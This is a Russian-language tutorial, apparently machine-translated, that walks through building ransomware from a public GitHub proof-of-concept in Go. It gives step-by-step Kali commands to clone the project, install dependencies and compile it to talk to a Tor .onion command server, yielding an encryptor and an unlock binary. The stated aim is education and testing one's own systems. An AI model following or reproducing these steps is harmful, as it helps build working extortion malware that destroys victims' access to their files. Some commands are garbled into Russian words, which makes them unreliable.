Программы-вымогатели — это быстрорастущая угроза цифровой безопасности, представляющая значительный риск для компаний и даже целых стран. Недавний всплеск новых вариантов программ-вымогателей, таких как Snake, специально предназначенных для систем SCADA/ICS, подчеркивает опасность, которую программы-вымогатели представляют для критической инфраструктуры. Поскольку разработчики программ-вымогателей продолжают развиваться и становиться все более изощренными, важно, чтобы организации принимали упреждающие меры для защиты своих систем и данных.
Чтобы лучше понять, как работает программа-вымогатель, давайте создадим собственную программу-вымогатель на основе Proof of Concept (POC), доступного на сайте mauri870 на github.com. Он разработал эту программу-вымогатель в рамках своей академической программы, и она предназначена не для вредоносных целей, а скорее для того, чтобы помочь нам понять, как работает программа-вымогатель. Подобно новому варианту Snake и растущему числу вредоносных программ, эта вредоносная программа написана на Golang.
Это вредоносное ПО шифрует файлы в фоновом режиме с помощью AES-256-CTR и использует RSA-4096 для защиты обмена данными с сервером. Эта программа-вымогатель очень похожа на Cryptolocker, одну из самых успешных атак программ-вымогателей в истории.
Шаг № 1: Загрузите и установите двоичные файлы
Первый шаг — запустить Kali и убедиться, что golang установлен. Если нет, загрузите его из репозиториев Kali, введя;
kali › sudo apt install golang
Далее вам нужно будет войти в систему под пользователем root.
кали › судо су -
Теперь создайте каталог для двоичных файлов. В данном случае я назвал его просто «git».
kali ›mkdir git
Затем измените каталог (cd) на этот каталог.
kali › cd git
Затем загрузите бинарники с github.com.
kali › git clone https://github.com/mauri870/ransomware
Шаг № 2: Экспорт переменных среды GO
Затем нам нужно установить некоторые переменные среды, чтобы направить двоичные файлы и GO в соответствующие каталоги.
Шаг № 3: Сделайте зависимости исходного кода
Теперь, когда переменные установлены и экспортированы, нам нужно сделать зависимости. Перейдите в новый каталог ransomware и введите make deps.
программа-вымогатель kali › cd
kali › сделай депс
Шаг № 4: Создайте исходный код с параметрами
Теперь, когда мы завершили сборку deps, мы можем приступить к созданию исходного кода. В нашем случае мы будем использовать несколько вариантов.
Во-первых, мы хотим использовать ToR для шифрования наших коммуникаций по сети ToR.
USE_TOR=true
Во-вторых, мы хотим использовать наш темный веб-сервер по адресу hackersarisegtdj.onion (вы можете использовать любой домен или локальный хост).
SERVER_HOST=hackersarisegtdj.onion
В-третьих, мы хотим использовать порт 80 (вы можете использовать любой порт).
SERVER_PORT=80
Наконец, мы хотим настроить операционную систему на компиляцию исходного кода для нашей операционной системы, в данном случае Linux.
GOOS=linux
Наша команда должна выглядеть примерно так;
kali › make -e USE_TOR=true SERVER_HOST=hackersarisegtdj.onion SERVER_PORT=80 GOOS=linux
Теперь нажмите ENTER и наблюдайте за компиляцией программы-вымогателя.
Шаг № 5. Проверьте каталог на наличие ransomware.exe
После того, как исходный код будет сгенерирован, сделайте длинный список в каталоге программ-вымогателей.
калий › ls -l
Теперь перейдите в каталог bin.
kali › cd bin
Здесь вы увидите программу-вымогатель.exe, сервер и файл разблокировки.exe.
Шаг № 6. Изучите типы файлов, которые необходимо зашифровать
Если вы хотите узнать, какие типы файлов будет шифровать эта программа-вымогатель, перейдите в каталог cmd и откройте common.go.
kali › cd cmd
kali › more common.go
Здесь вы можете увидеть расширения файлов, которые эта программа-вымогатель будет шифровать при запуске.
Краткое содержание
На данный момент программы-вымогатели, вероятно, представляют собой наибольшую угрозу для наших цифровых систем. Как ясно продемонстрировала атака Colonial Pipeline, почти все уязвимы, и если системы SCADA/ICS будут скомпрометированы, это может привести к значительным экономическим и инфраструктурным последствиям!
Этот POC программы-вымогателя поможет вам лучше понять программу-вымогатель как угрозу и проверить, уязвимы ли ваши системы для такой атаки.
Во второй части этой серии мы протестируем эту программу-вымогатель на виртуальной машине Windows.